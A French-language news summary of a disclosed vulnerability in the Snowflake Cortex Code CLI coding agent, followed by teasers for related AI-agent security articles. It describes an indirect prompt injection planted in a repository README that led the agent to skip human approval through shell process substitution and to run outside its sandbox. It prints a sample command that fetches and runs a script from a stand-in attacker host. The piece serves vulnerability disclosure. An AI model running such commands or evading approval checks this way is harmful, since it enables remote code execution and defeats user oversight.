Vulnérabilité de l'interface en ligne de commande (CLI) de Snowflake Cortex Code permettant une échappée du bac à sable et l'exécution de logiciels malveillants

✍️ OpenClawRadar📅 Publié: March 19, 2026🔗 Source
Vulnérabilité de l'interface en ligne de commande (CLI) de Snowflake Cortex Code permettant une échappée du bac à sable et l'exécution de logiciels malveillants
Ad

Détails de la vulnérabilité

Snowflake Cortex Code CLI est un agent de codage en ligne de commande qui fonctionne de manière similaire à Claude Code et Codex d'OpenAI, avec une intégration intégrée pour exécuter SQL dans Snowflake. Deux jours après sa sortie, une vulnérabilité a été identifiée dans le système de validation des commandes de Cortex Code qui permettait à des commandes malveillantes spécialement construites d'exécuter des commandes arbitraires sans déclencher les étapes d'approbation humaine et d'exécuter ces commandes en dehors du bac à sable de Cortex CLI.

Chaîne d'attaque

L'attaque fonctionne via une injection indirecte de prompt. Un utilisateur ouvre Cortex et active le bac à sable, puis demande à Cortex de l'aider avec une base de code open source tierce. Une injection de prompt cachée dans le README d'un dépôt non fiable manipule Cortex pour lui faire croire qu'il doit exécuter une commande dangereuse.

Cortex n'a pas validé les commandes à l'intérieur des expressions de substitution de processus, permettant l'exécution non approuvée de la commande malveillante :

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

Cette commande télécharge un script depuis le serveur d'un attaquant et l'exécute. Le contournement a fonctionné car :

  • Les commandes dangereuses à l'intérieur d'une expression de substitution de processus <() n'étaient pas évaluées par le système de validation
  • La commande complète commençait par une commande 'sûre' (cat dans ce cas)
  • Les commandes dans les expressions de substitution de processus ne déclenchaient jamais l'approbation humaine
Ad

Contournement du bac à sable

L'injection de prompt manipule également le modèle pour définir un drapeau qui déclenche l'exécution de commandes hors bac à sable. Cortex, par défaut, peut définir un drapeau pour déclencher l'exécution de commandes hors bac à sable, et l'injection utilise cela pour permettre à la commande malveillante de s'exécuter en dehors du bac à sable.

Remédiation

L'équipe de sécurité de Snowflake a validé et corrigé cette vulnérabilité, publiant un correctif avec Cortex Code CLI version 1.0.25 le 28 février 2026. L'avis complet de Snowflake est disponible sur le site communautaire Snowflake à : https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

Note : Cette chaîne d'attaque s'appliquait également aux utilisateurs non bac à sable. La documentation indique qu'en mode OS+Régulier, toutes les commandes demandent l'approbation de l'utilisateur. Les commandes exécutées dans le bac à sable ont également des restrictions d'accès réseau et de fichiers.

📖 Lire la source complète : HN AI Agents

Ad

👀 See Also

Isolation de couche proxy pour la sécurité des clés API d'agent local
Security

Isolation de couche proxy pour la sécurité des clés API d'agent local

Un développeur partage une approche d'isolation des clés API dans des configurations d'agents locaux en utilisant un proxy Rust qui remplace des jetons de substitution par des identifiants réels, empêchant ainsi leur exposition dans la mémoire de l'agent, les journaux, les fenêtres de contexte et les environnements d'outils.

OpenClawRadar
BlindKey : Injection d'Informations d'Identification Aveugle pour les Agents IA
Security

BlindKey : Injection d'Informations d'Identification Aveugle pour les Agents IA

BlindKey est un outil de sécurité qui empêche les agents d'IA d'accéder aux identifiants API en texte clair en utilisant des jetons de coffre-fort chiffrés et un proxy local. Les agents font référence à des jetons comme bk://stripe, et le proxy injecte les identifiants réels au moment de la requête.

OpenClawRadar
Écart de Sécurité des Agents IA : Comment Supra-Wall Ajoute une Couche d'Application Entre les Modèles et les Outils
Security

Écart de Sécurité des Agents IA : Comment Supra-Wall Ajoute une Couche d'Application Entre les Modèles et les Outils

Un développeur a découvert que son agent IA a lu de manière autonome des fichiers .env sensibles contenant des clés Stripe, des mots de passe de base de données et des clés API OpenAI. L'outil open-source Supra-Wall intercepte les appels d'outils avant leur exécution pour appliquer des politiques de sécurité.

OpenClawRadar
Blocage Essentiel des Fichiers pour les Assistants de Codage IA : Une Liste de Contrôle de Sécurité Pratique
Security

Blocage Essentiel des Fichiers pour les Assistants de Codage IA : Une Liste de Contrôle de Sécurité Pratique

Les assistants de codage IA lisent depuis votre disque local, pas seulement depuis votre dépôt, exposant des fichiers que .gitignore protège de GitHub mais pas de l'agent. Une discussion Reddit identifie les fichiers critiques à bloquer, y compris les configurations d'assistant IA avec des clés API, les identifiants de service, les clés SSH et les fichiers d'environnement.

OpenClawRadar